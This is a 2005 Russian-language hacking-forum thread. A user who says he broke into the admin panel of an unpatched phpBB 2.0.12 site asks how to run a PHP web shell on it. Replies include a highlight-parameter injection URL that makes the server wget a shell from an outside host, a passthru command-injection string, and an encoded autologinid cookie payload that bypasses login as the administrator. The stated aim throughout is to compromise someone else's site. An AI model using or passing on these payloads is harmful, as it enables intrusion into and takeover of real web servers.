Форумы O5 25: phpBB, админка, шелл

Discussion in 'Уязвимости CMS/форумов' started by Buddy, 9 Oct 2005.

1. Buddy

Buddy New Member

Reputations:
    0
    Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить.

Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить?

Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать.

Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать.

ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ!

2. Buddy

Buddy New Member

Reputations:
    0
    На вашем сайте видел такой способ:
    http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
    Но он не работает.

#2 Buddy, 9 Oct 2005
    Last edited: 9 Oct 2005
  3. africanec

africanec Banned

Reputations:
    -3
    там же можно изменить разрешшения файлов загружаемых в админке

4. Buddy

Buddy New Member

Reputations:
    0
    Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.

5. KEZ

KEZ Ненасытный школьник

Reputations:
    397
    Нельзя там через файлы загрузить шелл.

Понимаешь, эти строки выложены (мной кажется) для того чтобы те кто их использует ПОНИМАЛИ что они делают. Если просто вбить ее в браузер, заменив там адрес сайта то работать это будет в 10% случаев. Ты сначала пойми что это за баг а потом попробуй сам догадаться почему ничего не работает.

Чтобы небыло опять двацпять надо смотреть видео и читать сорцы и статьи про phpBB

6. Buddy

Buddy New Member

Reputations:
    0
    2 KEZ

В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12.

Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи.

Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать.

7. KEZ

KEZ Ненасытный школьник

Reputations:
    397
    Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть

8. madnet

madnet Умиротворенный

Reputations:
    423
    А разве highlight='.passthru($HTTP_GET_VARS[cmd]).' не работает на 12 версии?

DRON-ANARCHY Отец порядка

Reputations:
    50
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D